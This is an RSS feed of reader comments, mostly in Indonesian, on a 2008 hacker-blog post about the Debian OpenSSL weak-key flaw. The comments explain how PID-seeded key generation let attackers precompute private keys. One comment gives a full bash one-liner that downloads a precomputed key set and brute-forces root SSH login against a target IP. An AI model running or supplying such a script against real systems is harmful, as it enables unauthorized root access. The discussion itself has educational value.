<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Brute the crypto library</title>
	<atom:link href="http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/</link>
	<description>Defending Classical Hacker Mind since 1995</description>
	<lastBuildDate>Wed, 17 Feb 2010 10:01:26 -0500</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: degleng</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-323</link>
		<dc:creator>degleng</dc:creator>
		<pubDate>Sun, 08 Jun 2008 05:55:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-323</guid>
		<description>nyemialan apa itu, kokor kokor aku, qe3</description>
		<content:encoded><![CDATA[<p>nyemialan apa itu, kokor kokor aku, qe3</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: my own log &#187; Blog Archive &#187; Debian OpenSSL flaw</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-311</link>
		<dc:creator>my own log &#187; Blog Archive &#187; Debian OpenSSL flaw</dc:creator>
		<pubDate>Thu, 05 Jun 2008 11:11:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-311</guid>
		<description>[...] ssh di debian dapat ditebak karena pembuatannya hanya berdasarkan PID. Lengkapnya silahkan lihat di sini. Untuk mencek apakah key dipakai itu adalah key yang lemah atau tidak bisa menggunakan tool yang [...]</description>
		<content:encoded><![CDATA[<p>[...] ssh di debian dapat ditebak karena pembuatannya hanya berdasarkan PID. Lengkapnya silahkan lihat di sini. Untuk mencek apakah key dipakai itu adalah key yang lemah atau tidak bisa menggunakan tool yang [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: SSH Geek</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-256</link>
		<dc:creator>SSH Geek</dc:creator>
		<pubDate>Tue, 20 May 2008 18:59:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-256</guid>
		<description>wget http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2; tar jxvf debian_ssh_rsa_2048_x86.tar.bz2;ls rsa/2048/&#124;grep -v pub &gt; rsa.test;LIST=$(cat rsa.test);for FILE in $LIST;do echo Using private key $(pwd)/rsa/2048/$FILE;ssh -lroot -i $(pwd)/rsa/2048/$FILE -o PasswordAuthentication=no 222.124.xx.xx &quot;pwd&quot; &gt; /dev/null 2&gt;&1;if [ $? -eq 0 ];then echo $(tput setaf 1)Private key found : $(pwd)/rsa/2048/$FILE$(tput sgr0);echo Private key found : $(pwd)/rsa/2048/$FILE &gt;&gt; vulner.log;break;fi;done</description>
		<content:encoded><![CDATA[<p>wget <a href="http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2" rel="nofollow">http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2</a>; tar jxvf debian_ssh_rsa_2048_x86.tar.bz2;ls rsa/2048/|grep -v pub &gt; rsa.test;LIST=$(cat rsa.test);for FILE in $LIST;do echo Using private key $(pwd)/rsa/2048/$FILE;ssh -lroot -i $(pwd)/rsa/2048/$FILE -o PasswordAuthentication=no 222.124.xx.xx &#8220;pwd&#8221; &gt; /dev/null 2&gt;&amp;1;if [ $? -eq 0 ];then echo $(tput setaf 1)Private key found : $(pwd)/rsa/2048/$FILE$(tput sgr0);echo Private key found : $(pwd)/rsa/2048/$FILE &gt;&gt; vulner.log;break;fi;done</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: staff</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-230</link>
		<dc:creator>staff</dc:creator>
		<pubDate>Sat, 17 May 2008 11:42:53 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-230</guid>
		<description>hehe, yaph. absolutely right, my dear...


~ h3b</description>
		<content:encoded><![CDATA[<p>hehe, yaph. absolutely right, my dear&#8230;</p>
<p>~ h3b</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: phoenix</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-223</link>
		<dc:creator>phoenix</dc:creator>
		<pubDate>Sat, 17 May 2008 01:49:43 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-223</guid>
		<description>Hihi, iyhap kemaren salah baca reportnya :), kmrn posting comment makanya saya unapprove/delete lagi coz pada saat yang sama saya membaca ulang reportnya ternyata yang di guesing private key-nya, saya kira tadinya password PEM untuk private keynya he3x, mungkin sebagai catatan kalo authorized_keys nya dikasi PEM password saat generate ssh-keygen PoC dari mueller metinya masih minta password lagi. Hanya saja kebanyakan orang menggunakan RSA authentikasi untuk bypass authentikasi password. Salam</description>
		<content:encoded><![CDATA[<p>Hihi, iyhap kemaren salah baca reportnya <img src='http://www.kecoak-elektronik.net/log/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> , kmrn posting comment makanya saya unapprove/delete lagi coz pada saat yang sama saya membaca ulang reportnya ternyata yang di guesing private key-nya, saya kira tadinya password PEM untuk private keynya he3x, mungkin sebagai catatan kalo authorized_keys nya dikasi PEM password saat generate ssh-keygen PoC dari mueller metinya masih minta password lagi. Hanya saja kebanyakan orang menggunakan RSA authentikasi untuk bypass authentikasi password. Salam</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: wedew</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-217</link>
		<dc:creator>wedew</dc:creator>
		<pubDate>Fri, 16 May 2008 17:01:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-217</guid>
		<description>^sumpehhh looo.. !?!</description>
		<content:encoded><![CDATA[<p>^sumpehhh looo.. !?!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Cyberheb</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-216</link>
		<dc:creator>Cyberheb</dc:creator>
		<pubDate>Fri, 16 May 2008 13:45:37 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-216</guid>
		<description>nah, itu dia yg jadi letak titik permasalahan hole ini, karena private key dari authorized_keys bisa di generate sendiri, itulah yang dilakukan oleh HDM, generate private key utk 1024 DSA, 2048 RSA dan 4096 RSA. Private key-private key tsb yang akan menjadi kamus data dalam proses brute force, dan jauh lbh sederhana krn openssl debian hanya menggunakan parameter PID utk seed dalam randomisasi, jd sebenarnya randomisasi tersebut bisa di anggap tidak random.

Selama target merupakan mesin debian, atau turunan debian, atau menggunakan authorized_keys yang digenerate oleh openssl debian based maka bisa di lakukan dari mesin manapun, tentu saja terkecuali ada mekanisme IPS ;)</description>
		<content:encoded><![CDATA[<p>nah, itu dia yg jadi letak titik permasalahan hole ini, karena private key dari authorized_keys bisa di generate sendiri, itulah yang dilakukan oleh HDM, generate private key utk 1024 DSA, 2048 RSA dan 4096 RSA. Private key-private key tsb yang akan menjadi kamus data dalam proses brute force, dan jauh lbh sederhana krn openssl debian hanya menggunakan parameter PID utk seed dalam randomisasi, jd sebenarnya randomisasi tersebut bisa di anggap tidak random.</p>
<p>Selama target merupakan mesin debian, atau turunan debian, atau menggunakan authorized_keys yang digenerate oleh openssl debian based maka bisa di lakukan dari mesin manapun, tentu saja terkecuali ada mekanisme IPS <img src='http://www.kecoak-elektronik.net/log/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: staff</title>
		<link>http://www.kecoak-elektronik.net/log/2008/05/16/brute-the-crypto-library/comment-page-1/#comment-214</link>
		<dc:creator>staff</dc:creator>
		<pubDate>Fri, 16 May 2008 13:35:55 +0000</pubDate>
		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=80#comment-214</guid>
		<description>Author : SSH Geek 

Comment:
anyway, itu proses authentikasi ssh berdasar authentikasi RSA/DSA kan yha?? artinya proses brute force hanya bisa dilakukan dari host yang memiliki private key dari authorized_keys yang ditaruh di server, bener ga?? He he he,,, jadi saya pikir PoC untuk kasus libssl pada openssh ini risknya low-medium saja karena tidak bisa dilakukan dari sembarang host :)</description>
		<content:encoded><![CDATA[<p>Author : SSH Geek </p>
<p>Comment:<br />
anyway, itu proses authentikasi ssh berdasar authentikasi RSA/DSA kan yha?? artinya proses brute force hanya bisa dilakukan dari host yang memiliki private key dari authorized_keys yang ditaruh di server, bener ga?? He he he,,, jadi saya pikir PoC untuk kasus libssl pada openssh ini risknya low-medium saja karena tidak bisa dilakukan dari sembarang host <img src='http://www.kecoak-elektronik.net/log/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
</channel>
</rss>

<!-- Dynamic Page Served (once) in 0.588 seconds -->
